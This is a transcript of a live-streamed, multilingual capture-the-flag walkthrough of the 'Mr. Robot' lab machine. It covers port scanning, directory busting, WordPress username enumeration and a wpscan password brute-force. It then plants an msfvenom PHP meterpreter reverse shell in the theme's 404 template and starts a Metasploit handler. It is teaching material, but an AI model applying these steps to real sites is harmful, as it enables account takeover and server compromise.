We'll start in a minute. I'll just be patient till then. Okay. Yash Agarwal, hello, how are you? We'll just wait for a couple of more people to arrive and then we'll start with our session. So let's start then. Okay. Okay. Hello everyone. Welcome to the show that we forgot to name yet. So we will be doing this regularly though, and live sessions আমি কৰি থকা হ'ব আৰু I'll just explain why this started. So it has been quite a long time since I actually have properly practiced CTF, considering how much I have to work for my business and a lot of other stuff, and we also do a lot of development work, training. But ইমানখিনি কৰাৰ ভিতৰত মোৰ actually যোনটো এটা ডাঙৰ interest, which is solving CTFs, সেইটো অলপ পিছ পৰি গৈছে. So this is kind of a practice for my own, and it will be kind of like by myself learning CTF solving right from the beginning. Okay, I think a lot of connection issues are here. Okay, I hope you can see. So basically the point is that I want to regain my skills of solving CTFs, and I will do so with all of the people that are interested to learn. And আমি খালি CTF solve নকৰো, we'll do some other stuff also, learning new technologies, কিবা কিবি কৰি থাকিম এনেকৈ live sessions কৰি পেলাই. And আজি just tiklu sa eta CTF solve korim, and even if you know how to solve this CTF, or if you have already explored this CTF but you have no idea what a CTF is, you don't know what is hacking, no problem. মই ইমানে বেসিক্সৰ পৰা যাম যে যিকোনো মানুহে বুজি পাব লাগে. Okay, I won't guarantee it, but yeah, we are kind of starting with a very solvable and easily completable CTF. And the name of the CTF is Mr. Robot, and many of you have seen the show, which is Mr. Robot. So if we go to google.com and search Mr. Robot, which is possibly one of my favorite shows. So this is the show, and the name of the main character is Elliot Alderson, who is a hacker. And what happens is, he has his own hacking adventures, and this is the show with the most accurate hacking shown ever. In fact, the person who actually did all the hacking for the show, he is actually David Kennedy, I think his name is. He actually has built one of the most important tools for ethical hacking, or hacking, let's say.
and that tool's name is SE Toolkit. So it's a very important tool that we learn. Even in our course, it plays an important role here. So Mr. Robot or Operat, someone has made a CTF, and CTF is a capture the flag competition for those of you who don't know. And capture the flag competitions are ki hai, you get a control environment to hack things. Okay, you will be hacking a lot of things, and that will help you learn a lot. আজি আমি অলপ স্ক্ৰেচ আৰু কেইটামান বস্তু আনইউজুৱেল ৱেইট কৰিম, নৰ্মেল যোনটো ষ্ট্ৰেইট ফৰৱাৰ্ড ছিষ্টেম হয় সেইটো ছিষ্টেমত আমি নকৰোঁ, অলপ বেলেগকৈ কৰিম, যাতে আল্টিমেট পইণ্টটো হ'ল যে আমি শিকিব লাগে, অলপ বেছিকৈ আমি শিকিব লাগে. ডেট ইজ দ্য আল্টিমেট পইণ্ট. অ'কে, so I'll come. So the first thing that you need to do is, let me just check one thing very quickly. Okay. So this is the Mr. Robot installation file that I have, and I got it from a website which is known as valhub.com. So just go to this website. Olop more eta bhanke ahi ase, but properly ahi jabo. Okay, it will come properly in your desktop. More eta actually some configuration problems are there, because of which eneke ahi ase. Okay, so ami eta valhub.com or jam ami search korim Mr. Robot, and I will download the file that is accompanied with it. So this is the file. We will either use VirtualBox, which is a virtual machine, or we will use VMware. Okay, Murtat VMware Fusion ase, and you can also download the other tool which is known as VirtualBox. Okay, so here. So these are the two tools. Both will equally work really well, and you just need one of them. Moi VMware Fusion at kori aso. আমি কি কৰিম, আমি ইয়াতে নিউ বুলি এড কৰিব লাগিব প্ৰথমতে. We will add a new one, and connection problem neki. We'll just wait a second. Okay, so a bit of connection problem is also going on, but you need not worry. I'll repeat anything that gets missed. And Abhay Mac says hi Abhay. Okay, so what we'll do is we'll just bring it here, and we'll click on continue. নিজেই সব কনফিগাৰেশ্যন হৈ যাব. Mr. Robot এইটো সেভ কৰি দিওঁ. It will take a couple of minutes. Nothing to worry about. If you have any doubt, ask me immediately. I'll explain it to you. And we'll click on finish. Upgrade, doesn't matter, upgrade hoila. Okay, and we'll click on play. And it is soli jabo. And beyond this, we actually do not need to do anything at all. He নিজেই সব কাম কৰি থাকিব. আমি জাস্ট এতিয়া আমাৰ যোনটো কালি লিনাক্সৰ মেচিন হয়, আমি হেতুলৈ আহি যাম এতিয়া. Okay. And okay, so we will start the hacking. Let the hacking begin. Okay, first of all, the very first thing that we need to do is we need to find the IP address of the I'll just take a question. Ravi Ranjan Kumar is saying, hello sir, will you be showing some basics of Metasploit? Yeah, we will be using a bit of Metasploit today. You have to wait for some more time, and you will actually learn quite a lot about Metasploit as well. I mean, actually bahut khini topic or through exam, and I'll try to simplify everything as much as possible, even if you do not have any idea of computer science or even anything else. If you just look at it and note things down, you should be able to solve it as well. And the video will be saved in Facebook, so you'll just be able to access it anyway. Okay. Now, the very first step is finding the IP address of the machine that is there. We are presently, our
আমি এটা নেটৱৰ্কত আছোঁ আৰু এটা মেচিন আছে যোনটো হয় মিষ্টাৰ ৰবটৰ মেচিন আমি মিষ্টাৰ ৰবটক যোনটো এলিয়ট হয় এলিয়টক আমি হেক কৰিব লাগে এতিয়া এলিয়টক হেক কৰিবৰ কাৰণে আমি তাৰ প্ৰথমতে আই পি এড্ৰেছ বিচাৰিব লাগিব কাৰণ আই পি এড্ৰেছ নিবিচাৰাকৈ আমি তাক হেক কৰিব নোৱাৰোঁ আমি সৰ্বপ্ৰথমে এতিয়া আই পি এড্ৰেছ বিচাৰিবৰ কাৰণে আমি ৰুট ইউজাৰ হৈ ল'ম যোনটোৰ কাৰণে কমাণ্ড হয় su do minus I okay and we are in the root user now and we'll use a tool which is known as arp scan local and both khini devices ahi goise okay but I will take a safe guess and I think this is the one because my VMware at cholai aso and yate VMware boli ahi goise no okay so this is the IP address of our CTF ami etut we need to hack here okay and we'll just copy it and we can okay so here is what I'm going to change what I would normally do and all of better basic system use karim so normally what you can do is you can use one tool which is known as nmap okay nmap jodi ami use karo if we use nmap we will immediately get all the details of this VM but what I don't want wait a second the net okay yeah sorry the internet keeps cutting again and again shout out to Mnet thank you for your slow internet okay so we will write a script okay we will actually we will ourselves write a script and we will just not take the conventional method okay ami just some je nmap e kene kaam kore ami eta nijor script likhilom yare karone okay which will be more interesting to be honest nmap to dilo just ahi gol ami just all of eta just nije we will write a script to solve it okay so etia ami eta kaam koro ami prothomote as I said ami arp scan local use korilu and we got the IP address of the because VMware hosted ase so VM etue hobo okay so jodi heri na hoy tite ami nmap kori bare bare check kori thakibo lagibo and now what we will do is we will go to we'll just exit from the root user and ls okay so I'll just yes so I was hacking someone earlier okay okay so we will write a Python script okay we'll write a very small and very handy Python script jontor karone ami gom pam je ki port khola ase ba khola nai okay ami korim vim I'll use a text editor which is known as vim okay text editor avile kone vim scanner.py okay we are making a scanner like nmap no okay and ami prothomote ate korim ami declare korilom je ami python programming kori asu I'll explain what is being done in the Python programming so if you don't know Python programming do not get scared dhunia ke hoi jabo it's just very easy okay I'll even after the thing I will put a link jahan pe I'll put all the scripts and everything that I have put used here to solve this and gute hini moi tate rakhi dim you will just need to access it okay so let's be so import socket bele ekone ami socket programming korim eto socket programming boli kora hoy jetia multiple network devices or connection or kiba ami programming koribole ami socket use koribo lage hore then ami use korim ami eta variable eta declare koro ip equal to raw input enter the ip address okay then আমি কৰিম port equal to
input port done. এতিয়া আমি সকেট প্ৰগ্ৰেমিং আমি ষ্টাৰ্ট কৰিম ওকে ইট ওয়াজ জাস্ট মোর লভ এইখিনি জাস্ট আমি গুচাই দিওঁ জাস্ট টু বি শিওর আই ডোন্ট ওয়ান্ট টু মেক এনি এৰৰ ওকে আমি সকেটৰ প্ৰথমতে আমি সকেটৰ কানেকশ্যনটো আমি ডিক্লেয়াৰ কৰিব লাগে সো সকেটৰ কাৰণে আমি এটা ভেৰিয়েবল ডিক্লেয়াৰ কৰিম প্ৰথমতে ভেৰিয়েবল sock equal to socket.socket then socket dot af underscore inet comma আকৌ socket dot sock stream okay আমি socket module টোৰ পৰা এখিনি ইউজ কৰিম বস এটোৱে বেলে একো নাই okay এতিয়া জাস্ট আমি এটা সাম don't worry if you have not understood until now nothing to worry about সব এটা বুজি পাম if sock dot connect print port comma port comma is closed okay and to be honest kita bracket to dorkar nai then else print port comma port eta ami space did just an error to be honest we don't need all this is open and this is the code that we are going to use okay so basically ami socket boli eta module use kori asu jonto inbuilt module hoy python or bhitorot and hey my spelling mistake ase CONE okay আমি মডিউল টু ইউজ এটো কাৰণে কৰি আছো যাতে আমি নেটৱৰ্কৰ ডিভাইস এটাৰ লগত কানেকশ্যন এটা কৰি চাব পাৰো ওকে সো ইয়াতে আছে sock.connect_ex ওকে আইপি কমা পোর্ট আমি এই আইপি টো যোনটো আমি ইয়াতে এন্টাৰ কৰিম এন্টাৰ দা আইপি এড্ৰেছ আৰু এছত এই পোর্টটো এন্টাৰ দা পোর্টত যোনটো আমি পোর্ট দিম সেই পোর্টটোটা আমি ইয়াতে এই আৰ্গুমেন্টত ভৰাইবলে আমি দিম and he check koribo je hey port tuta soli ase ne nai jodi kiba problem hoi jay tetia ki koribo port is closed ex mane exception jodi connect kote exception jodi ahe tene hole tumi just koi diba je port is closed aru no hole jodi eko problem nai tetia tumi just koi diba je yes the port is open it's a very simple program bele eko nai okay ma solai dekhao it will be clear as day for you okay so ami edu enege solabo nuaro we need to give it executable permission and linux or executable permission dia bahut easy hai all you need to do is chmod +x scanner.py is the name of our file okay and we'll click on enter okay etia ami korim ./scanner.py very easy okay I mean just we are running it okay and okay maybe ami kiba error koriso eko problem nai well live video eto a lot of disadvantage je ami error bur rakhi dibo laga hoy okay amar eta else ot mara bhul korise ete semicolon hai colon to dia nai okay scanner enter the ip address ami ip address gom paisilo no I do not remember okay I'll just make a guess 2.168.1.1 48 asile botha okay and then enter the port now what will happen is ami jikono eta port so there are 65535 ports in any network device no matter how small or big it is okay if you're using a networking device there are 65535 ports what are ports
ports are basically what any device will use to communicate with each other. Okay, just communicate koribo karone ports jeneke you will use a door to get into the room, or you might also use the window to get into the room. All these are ports. Okay, what you need to do now is just use a port to get into or get out. But that's all you need to do. Okay, so we'll just check ki 1000 port to soli ase ne nai. We'll just check. Okay, and suspense di ase olop. It is checking actually. Let's see. Okay, did I not write the program properly? Kiba mistake irila neki? Chalo koi baat nahi. We'll just check check a port that might be there. Okay, 192.168.1.148. So ami kaam korim. We will, the first port that we'll check is the port. There are some very common ports. Okay, 20, 22, 23, 25, which is SFTP port, then 80 and 443 and 3306. So these are the most common ports. So the first one that I always like to check is the 80, port 80, and see the port 80 is open. No? Port 80 is open. I'll explain to you what port 80 does, and you will actually be able to understand. Okay, so and we will then do one more check. Okay, we'll enter the IP address 192.168.1.148 and enter the port. Let's just say 22 asenenai. Port 22 is closed, no problem. So port 22 is closed mane is the port for SSH. Okay, tamane SSH to off hoye ase, and ami to use koribo probably noarim. Okay, then again ami eta sao 443 sorry 192.168.1.148 enter the port 443. 443 is open. So SSL amar thake na HTTPS ahi jay. He port tur karone ami port 443 to dorkar hoy server. Okay, so I think etai thakibo. We'll just check for the MySQL 3306 wala port. So 192.168.1.148 and 3306. Yeah, I don't know. He check koribo parane. Okay, so আমি যেহেতু কোডত লিখাই নাই, সো হি আহাই নাই, হি দেখুৱাই নাই, আমাক জাষ্ট দেখাই আছে যে পৰ্টটো ক্লোজ আছে নে অপেন আছে. চ' ক্লোজ থাকিলে ক্লোজ বুলি দেখাই আছে, open থাকিলে open বুলি দেখাই আছে. We have port 80. So I'll show you what magic port 80 does is. So have you noticed that you have typed the name of a website and the website opens on your browser? Okay, so there is nothing magical about this. Is just like the most usual thing you've ever seen. But the main point is, hey website to ahi ase, hey server to port 80 pora. 80 ta mane amar etu server Mr. Roboter server jodi port 80 to khula ase, ta mane definitely eta website host hoy ase. ঠিক আছে, so আমি হেতু কারণে হেতু কারণে আমি যাম আমার ব্রাউজারত and আমার IP address to লিখি দিম ইয়াতে. Okay, which is 192.168.1.148 and এটা website খুলিব লাগে এতিয়া. Wow. Okay, this is actually very cool. So for those of you who have just logged in,
to this video. Welcome. Thanks for watching. So this is the, just keep watching, you will understand everything, nothing to worry. Okay, so this is basically the website. So they have put some commands like prepare. Okay, prepare. Let's see what it does. Okay, so these are basically footage from the series Mr. Robot. Okay, chalo. So now the actual hacking will actually begin now. And what I am going to do is, at first I'll just check a file which is known as robots.txt, which is there in most websites. Besibhag website ote robots.txt file to thake. Okay, the point of playing a CTF is to get the flag. Okay, there are some flags hidden in the entire CTF, and what you need to do is you can find the flags, and if you find all of the flags, then you have won the CTF. That's the point of playing a CTF. Okay, so আমি first robots.txt লৈ যাম. See, something else. So there is actually a robots.txt file here, and apparently ইয়াতে দুটা link দিয়া আছে. I'll just let me see if I can zoom it or do something like that. Okay, see, there are two files or two pages at least. Okay, so what I'll do is I'll take this, I'll copy this, and I'll paste it here, and I'll enter, and etu moi save kori dim. Okay, ঠিক আছে, হেতু হইল. and এতিয়া আমি চাম এটো আছে আমাৰ, এটো কপি কৰিম, we will again paste it here and click on enter. See, key 1 of 3, তাৰ মানে তিনটা কি আছে বোধহয়. Okay, বোধহয় না হয়, definitely তিনটা কি আছে, and this is the first one. So we'll copy it, we'll come to our this page, and we'll just open a text page, and we will take it back here, and আমি কৰিম এটো কৰিম এতে আমি paste. Okay, this is the one, key number 1. Okay, this is the first key. So congratulations, আমি 33% of the CTF solve korilo as of this point. I am pretty much sure that everyone who is watching can understand what has happened, because yate ami enekwa hacking tools eko kora nai, programming korisu, imane programming kom korisu je it can barely be considered programming at all. We wrote a program which is only 7 lines long. It's not a huge program. Okay, so now let's just go back to the website. So now we will actually use a hacking tool now, which is going to be very exciting. And I actually really adore this little tool. It's such a small tool, but the kind of like jo dahshat machata hai, the kind of thing it does is just amazing. What I'm going to do is, see, when we go to any website, okay, let's say we have come to trustnetics.com. So here trustnetics.com/training boli ase. Okay, then if we go to development, yate ase trustnetics.com/development. Okay, so ami etia just will come back, and ami yate etia we actually do not have a way of knowing je ki hoyto yate link thakibo, especially considering je yate eko button e nai. Okay, yate jehetu eko button e nai, we actually have no way of knowing je ami ki tool কি ইয়াতে দিলে কিবা এখন বেলেগ পেজ খুলি যাব. Okay, হেডৰ কাৰণে আমাৰ এটো ডাইৰেক্টৰী বুলি কয় by the way. So we need to find the directories. So we'll use a tool which is known as a directory buster. কি হয় নামটো? Directory buster হয়. বহুত ইজি টুল হয়, একদম সিম্পল কমান্ড হয়, and very easy to understand. What it will do is এখন লিষ্ট ল'বহি, সেই লিষ্টখন লৈ পেলাই সি বাৰে বাৰে এই ৱেবছাইটটোত ৰিকুৱেষ্ট পঠিয়াই থাকিব, আৰু যেতিয়ালৈকে positive response পাই থাকিব হেকেটা আমাক দেখাই দিব যে okay, these are the pages that are there. একো problem নাই. If you have not understood, you will understand it in 1 second. The command is dirb, directory buster. Okay, then http://192.168.1.148. This is the command. Bas itna sa command hai. All you need to do is press
enter and see it will show যে এই লিংকটোত কি পেজেছ আছে পেজবোৰৰ দেখাই যাব এটা এটাকে there is a page called /0 এইটো ইণ্টাৰেষ্টিং লগা নাই you'll just take the list and আমি এটা কাম কৰিম যে আমি ইণ্টাৰেষ্টিং যোনখিনি wow that was a lot of okay so we'll just do one thing মই এটা ইণ্টাৰেষ্টিং see there was this thing admins and okay maybe the admins is a bit okay 503 আহিছে একো নাই আমি কমান্ডটো দিওঁতে ভুল কৰিলো নেকি বাৰু চলো कोई बात नहीं let it take its time okay well wow some things take time in hacking it's not like the movies so you'll just take a random tablet and click a button and everything will happen magically this actually takes quite some time okay this is taking too much time no matter how much fast your computer is some things will definitely take a long time so we actually found a folder which is normally not there and okay index.php chalo j paise zero loke ami sabo lagibo khali so moi oloba kota eta admin buli paisilu yate we'll just do one thing we'll come here and click on admin buli search korim see this was a honeypot they were just trapping us because see this will keep moving okay loader to this will just keep moving and moving but you will not get the result ultimately this will eventually on an older system what will happen is browser to crash ho jabo okay so this is the trick that they have used okay admin page khon nai but eta like jehetu admin dekhlo admin yate pora to ami sob control pai jam heneka eta thinking to hoy na so eto actually trap koribo karone yate eneke rakhi dise okay let's see he kiman pale oh my god should I just check it again derb http 68.1.148 चलो एकेलगे दुटा चलाई पेले चाও wow this is okay I'll just close this one because it was error is okay we'll just come back to this one and okay I'll just do it once more okay so derb and we'll click on this but ebar hunkale hobo I'm sure ebar olop hunkale hoy jabo even I forget how to do something so we'll actually be seeing je keneke korile it will be better so ami already admin to check korilo and well we did not get a positive result atom buli eta ase I do not think that is going to be very interesting blogot no ki hack koriba I promise 1.5 minute hoy jabo 2 minute at max okay the css folder thake na dashboard buli eta ase let's check the dashboard je kiba ase niki okay dashboard oh something already came
Wow, did not expect this. Okay, ठीक है से. We'll see. Dashboard, favicon.icon, so you know it's the icon. Okay, I'm actually pleasantly surprised that we reached the dashboard so easily. I'll just check something if this works. Okay, this actually works. Okay, we actually reached the dashboard very easily, and you can clearly see we are dealing with a website which is hosted on WordPress. See, this is the symbol of WordPress, and especially if you look at the link, this is wplogin.php. Okay, wp login, wp WordPress. Okay, wp mane WordPress, and we'll just come here. So login buliyo eta ase. We'll just check a few of the things and then login no. Okay, login or wp login ate pothiye. Okay, I'll come back. PHP myadmin eto khulila apna khulna khabo. Then readme. RSS2 sitemap.xml. Sometimes that becomes very useful. And UV. Sorry about the noise. Some things are here. Okay. See, WP admin to ahi gola amar yateo. Okay. So we are now confirmed that WP it is a WordPress site. Ami 100% guarantee amar hoi gol etia. Ami just etia eto login koribo lage, but we have no idea how to login. Okay. Basic hacking tactic eta moi koi so etia. Whenever you need to log into somewhere, it is usually very carelessly. Most developers, I am not even saying that some developers do it. Most developers just put in their name, or if you want to get into an admin panel, they will put the username as admin, which is so damn careless. Don't do that. What you have to do is username of me admin this, and we'll put a random password. Just okay, and we'll click on login. See, invalid username. Okay, so remember when we were looking at Mr. Robot, the TV show, and we actually found the characters' names, right? Mr. Robot eta character naam hai, then Darlene hai, Elliot hai. Okay, so আমি এটা কাম কৰিম, Mr. Robot type কৰিম, and again নোচোৱাকে কিবা এটা password type কৰি দিলো, random, and we'll click on আমাৰ কি আহিছে, আমাৰ আহিছে invalid username. কি আছে invalid username. আমি এটা কি কৰিম হেতু কাৰণে we'll finally use, we'll just let's see যে আমাৰ লাক কিমান ভাল হয়. We will put the username as Elliot. Okay, যেতিয়া আমাৰ ভুল আহি আছিলে, just notice যে ইয়াতে invalid username বুলি আহে. কি বুলি আহে invalid username বুলি আহে. এতিয়া আকৌ পাছৱৰ্ড আমি কিবা এটা random কিবা এটা দি দিম, and আমি login at tipim. See, the password you entered for the username Elliot is incorrect. The password you entered for the username Elliot is incorrect. So this is where the real hacking starts, because now we know that actually Elliot is the name of the username. I mean, username already palwe. Of the two things that we require, the username and the password, we already have 50% of it. Eta khali me password to ulabo lage na. How difficult is that going to be? Well, a bit difficult, to be honest. But if you remember, ami jete olab agote, we'll just go back to this robots.txt jate we had downloaded this file. Okay, we had downloaded this file, and we'll go to cd:/downloads, and we'll ls, we have the fsociety.dic. dic means probably dictionary there. That's what they are
hinting at probably. So what we'll do is we'll do cat money read. Okay, so f society dot अरे यार की हो আছে এইবিলাক নতুন গালি লিনাক্সত অলপ বেছিয়ে হেৰি features দি দিছে okay so see this is a list of names okay this is a list of words and it just some of them are very clearly passwords okay some of them you can see here right this definitely looks like a password okay so yate probably we have the password of the this one থাকিব পাৰে ন entirely possible হয় so আমি হ্যাক কৰিম আজি ইয়াৰে পাসওয়ার্ডটো এতিয়া আমি we do not have any idea what the password is but we will find it out now so we will go here and প্ৰথমতে আমি just check one thing আমাৰ যোনটো এটা ফাইল আছিলে fsociety.dic so we'll check how many words are there okay how many words so হেইটো কাৰণে word count আমি কৰিম fsociety.dic see there are 8,58,000 so iman keta password ami eta ke try kore olop time lagi jabo hai na so we will sort it okay ami sort korilam sort not shord and then we will kiba eta to dubaru thakibo pare tinbaru thakibo pare panchbaru thakibo pare so what we will do is we'll sort it and we will just duplicate khini nagia kore dim ami okay so for that the command is again extremely simple it is cat f o c i t y dot dic space ba eto grep okay sort ami sort koribo karone okay so this just the pipe signifies this part of the command becoming an argument of this part of the command okay then sort dilo and ami sort korim prothomote aru ami unique korilom okay so uniq unique okay spelling mistake hone this is the command okay and we'll put it into a new file the name of the file ami kiba ta rakhile also f society1 dot okay and ami marim enter okay enter marilo eta ami sam fsociety1.dic boli file eta ahi gol amar yate so ami ki koru eta ami etu koru word count f1.dic see 8 lakhs asile eta amar 11,000 dote hoi goise amar okay 11,000 amar hoi goise this will be much faster right so now we will use a tool jontu e 11,000 password automated systemot eta ke yate entry koribo karon I mean were you expecting they will put one password here then click on login then again put another heto to no hoy no heto to koi thakile it will be just too harsh on you so we are not going to do that what we are going to do is we will just use a tool jonte automatically eta ke password entry kori thakibo aru he password bo entry korar pise it will give us the correct password ultimately ami eta tool use korim and he tool tur naam hol wp scan okay wp scan okay wordpress scanner okay that is the name of the tool so wp scan okay then minus url I hope you can see the commands and everything letters are big enough okay I really hope that you can see it and if it's smaller just tell me I'll increase the font size okay 192.168.1.148 then আমি usernames to already jano username to ki hoy username to hol Elliot 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 and passwords khini kor ase fcity1 dot dictionary file dot ei dictionary file dot amar passwords gute hini di thwa ase so eta ami ki korim ami etut korim enter and he nije kiba kibi check kori thau moi etu bondho kori directory buster eta choli ase for some reason so you can also use this command to this for this effect zoom out
যদি কেইবাৰমান zoom reset কৰি দিওঁ ন okay so just if you use this command so live hacking session you can okay so এতিয়া পাসওয়ার্ডটো হি অ্যাটাক কৰি আছে ঠিক আছে it's attacking the passwords WP scan it will attack the passwords one after the another it will take some time even local network thakar sotte it might actually take quite some time okay okay see okay the password this is the password okay so this is actually the identity number of Elliot in the show okay this is the identity number of Elliot in the show Mr. Robot okay so eto ami ki korim etia we will just take this and we will paste it in the password we'll click on paste how many of you think it will work I think Ravi asks does this process be the same attacking on any social site account kind of okay but don't use it for malicious purposes they will definitely have some sort of protection for that okay so don't use it for malicious purposes that's the point this is entirely educational content so only use it for good like me I only use it for good okay wink wink so login core so we'll click on login and let's just see if okay see we have come to the dashboard now we have reached the dashboard Biraj Gogoi hello there hi bro hope you are well happy new year have not met you recently okay so okay now we have control over the dashboard now it was easy right it was like insanely easy okay so भैया Facebook नहीं हैक करना है okay रवि रंजन कुमार नहीं करना है Facebook किसी को हैक okay don't attack someone's Facebook okay so WP scan say you cannot hack Facebook you will need a different tool okay maybe you will be able to see it in our next live stream okay we will try to do it at least 2 to 3 times a week this kind of live streams so that at least more practice hoy beleg no holo okay so ami the dashboard rahi paisa okay we are actually connected to the dashboard and now we can connect to the server because remember what we are searching for are flags in the CTF okay we are searching for flags in the CTF okay for that we need to connect to the server jonto server opora website to ahi ase amar tate that is going to be extremely important so ami jam etia yate dhuniya ke we'll go to appearance and we'll go to the editor okay appearance ot goi pale ami editor le jam and yate see all the code that is there yate likha ase okay and see yate 404 template eta ase this is the design of the 404 mane site not found ba page not found basically not found hole 404 error hai so yate robots just rd dio and enter maro see oops that cannot be found ei page khono code to amar yate dia ase so just a little recap ami password ami username to ulalo with inference we inferred the username then we actually properly hacked the password from the server ami website to ba password to actually crack korlo if in case the people who are joining in now if you have missed it you can go back and come back here again and ami etia next ami server access long within the next 5 minutes okay let's 11:20 hoye ase let's target 11:25 to be the time when we will have actual access to the server okay target lete tab tak okay so jetia page not found hoy jay tetia tomar eneke ahe okay etia ami ki korim ami eta tool use korim which is the best tool okay amazing tool for pen testing and that tool is known as MSF Venom ami eto di payload create koribo paro what is a payload ami he attacking material khini he code khini malicious content khini ami humai rakho okay zone khinir pora ami eta shell pabo paro it will be used to
connect to someone else's computer. যেনেকে তোমাৰ তাত malware যদি কেতিয়াবা install হৈ যায়, Trojan install হৈ যায়, ransomware install হৈ যায় on your desktop when we are installing some cracked software. That happens because someone has sent a payload to your computer in some way. যেনেকে this guy has a crack and that is executed by you on your desktop and হেতুৰ কাৰণে your connection is made to the attacker. Cyber criminal তোমাৰ access কৰিব পাৰে. Other day some guy came to our office, opened the laptop and I saw his camera light was turned on because he definitely installed some crack software and he crack software to install কৰাৰ লগে লগে যোনটো malware আছিল, যোনটো Trojan আছিলে, okay, rat বুলি কয় ন, সেই ratটোৱে কেমেৰাটো অন কৰি ৰাখি থৈ দিছে. Okay, so that is known as payload. Okay, so আমি এটা payload এটা create কৰিম. আমি কিহৰ payload create কৰিম? See, ইয়াতে I will see আমাৰ এটা সব 404.php আছে ন, archive.php, comments.php. Okay, so এইবিলাক PHP আছে. আমি PHP এটা payload create কৰিম. Okay, we will go to our terminal and we will start msf venom. Okay, so actually command to ahiye goise. So -p mane payload. Okay, php/meter preter /reverse underscore tcp. Okay, eto meter preter /reverse underscore tcp. Just remember eto mistake hoy jay. Then lhost equal to 192.168.1.144. Okay, so this is my IP address. This is my own. So I'll make it clear. If config jodi maru yate mor nijor IP address. Okay, mo koi asu yate ki hobo, I'll be explaining it to you. So this is my IP address, so I'll copy it and I'll paste it here. Then l port equal to 1337 kiba da port ami just random rakhi disu yate, and -f raw. Okay, so ito command I'll just quickly explain it to you. msf venom obviously is the name of the command. Then -p mane আমি এটা payload to dim. Okay, আমি payload to kundu disu. The name of the payload is php/meter/reverse tcp. Okay, php meter preter reverse tcp is the name of the payload. Okay, lhost my local host. Okay, payload to jabo no, আমি যাক attack কৰি আছো আমাৰ victimৰ মেচিনৰ পৰা payloadটো আমাৰ মেচিনলৈ কানেক্ট কৰিব লাগিব ন. Okay, so আমাৰ মেচিনলৈ কানেক্ট কৰিব কাৰণে আমাৰ মেচিনটোৰ হি IP এড্ৰেছটো গম পাব লাগিব. And to know that IP address আমি হেতু আমাৰ নিজৰ IP এড্ৰেছটো আমি if config কৰি বলে উলাই লৈছো. if config command. Okay, then interface যোনটো configuration হয়, and we will paste it here. And l port, so as I said 65,535 da port থাকে, and তাৰে কোনবা এটা port মই খুলি ৰাখিম এতিয়া. ঠিক আছে, আমি কোনবা এটা port এটা কি কৰিম, আমি খুলি ৰাখিম. and সেই port to খোলা কাৰণে it will know যে exactly কোন ফালেদি সোমাব লাগে. যেনেকে যদি লুকাই ফ্ৰেণ্ডৰ ঘৰত গৈ আছো, তেতিয়া ফ্ৰেণ্ডে ক'ব সমুখেদি নাহিবি, পাপাই গালি দিব, তই মই পিছফালে খিৰিকীখন খুলি থৈ দিম, তই আহি যাবি. কিন্তু তুমি যদি এতিয়া গৈছা, গৈ পেলাই খিৰিকী কোনখন তাৰ দেখিছা, অ'কে বহুত ডাঙৰ বাংলো হয় এণ্ড 200খন খিৰিকী আছে এণ্ড ইউ ডোণ্ট ন' হুইচ খিৰিকী, তেতিয়া অলপ দিগদাৰী হ'ব ন. চ' ই কৈ দিব নহয় লেফ্ট ছাইডৰ প্ৰথম খিৰিকীখন খুলি থৈ দিম, তেতিয়া তোমাৰ ইজি হ'ব ন. সেনেকৈ আমি কৈ দিছোঁ যে এইটো চব 1337 এই পৰ্টটোত আহি যাবা. Okay, the example was really bad, even I know. Okay, so let's just ignore that happened. Okay, so and then -f raw মানে output to আমি raw direct আমি ইয়াতে print কৰি দিম. Okay, we'll see -f raw দি কি হয়. So আমি এটা খালি ইয়াতে enter মাৰিম, বেলেগ একো নাই. We'll just click on enter and we'll wait for a couple of seconds. See, okay, is a -f raw দিছিলো. Okay, because of that আমাৰ ইয়াতে গোটেইখিনি কোড ডাইৰেক্ট ইয়াতে আহি গৈছে. Okay,
Okay, I got disconnected. I hope things are better now. I hope everyone can see. Okay, okay. I can see that everything seems to be working well. Okay, Ravi Ranjan Kumar, your explanation is okay. Thank you, bro. I'm so happy that you have found it very clear. Okay, so etia we can see here that মই অসমীয়া আৰু ইংলিছ মিক্স কৰি কৈ আছোঁ আই হোপ কাৰো প্ৰব্লেম নহয় মোৰ অসমীয়া বেছি ভাল নহয় ইংলিছো বেছি ভাল নহয় দুটা মিলি পেলাই আই কেন স্পীক ৱেল চ' এইটো আমি কপি কৰিম এজ এ ছেড আমি -f ৰ দিয়াৰ কাৰণে ডাইৰেক্ট ইয়াতে দেখাই দিছে এণ্ড আমি এতিয়া যাম আমাৰ ৱেবছাইটটোত এণ্ড চি 404 টেম্পলেট যোনটো আছিলে আমি ইয়াতে কি কৰিম Ctrl+A মাৰিম কি মাৰিম আমি Ctrl+A মাৰি দিম অ'কে এণ্ড আমি গোটেইখিনি মুচি দিম ইয়াৰ পৰা মুচি দিম আমি Ctrl+V মাৰি দিম আমি যোনটো ইয়াৰ পৰা পে'লোড পাইছিলোঁ ন এইটো পে'লোড অ'কে আমি পে'লোডটো ইয়াতে আমি পেষ্ট কৰি দিছোঁ ক'ত পেষ্ট কৰি দিছোঁ আমাৰ 404 টেম্পলেটত অ'কে এণ্ড আমি এইটো এতিয়া তলত আপডেটত টিপি দিম ঠিক আছে very easy okay now what I'm going to show you is the main dangerous part I'm going to connect it to our computer okay amar নিজৰ computer এটা connect কৰি লম and what I'll do is I'll just use another tool which is known as MSF console okay MSF console and MSF console basically কি কৰে আমি MSF just let me be clear about one thing MSF যেতিয়া আহে it means Metasploit framework okay Metasploit framework to আমাৰ যিকোনো ট্ৰোজান বা এনেকুৱা exploit even arbitrary attacks auxiliary attacks বহুত কিবা attacks আছে forward attacks forward connection attacks reverse connection attacks so এইবিলাক গোটেইখিনি মানে ধৰণৰ attacks বোৰ কৰিবৰ কাৰণে আমি MSF console use কৰো so আজি let's just see some implementation of MSF console and MSF Venom today and in the future classes in the future sessions let's not call these classes আমি আৰু কিবা চাই থাকিম okay so MSF console বুলি আমি টাইপ কৰি দিম and আমি এন্টাৰ কৰিম তাৰ পিছত আমি চাও কি আহে the Metasploit framework console is being started so see কি কৰিব পাৰি ইয়াতে আমাক হি দেখাই দিছে okay reconnaissance কৰিব পাৰো reconnaissance মানে something yeah exploit then payload আমি already use কৰিলো না and then well okay so there are 2081 exploits and kibi enekwa ase encoders NOP sleds and 7 evasion techniques so these are the things that are there in MSF console right now okay this is a proper hacking tool this kind of tool is even used by to be honest any level of hacker okay any level of hacker will use MSF console and most advanced hackers will definitely write their own programs but still MSF console is so handy that most will use it okay so আমি এটা কাম কৰিম we'll first use a module let's call it which is known as multi handler okay so use exploit /multi/handler okay so 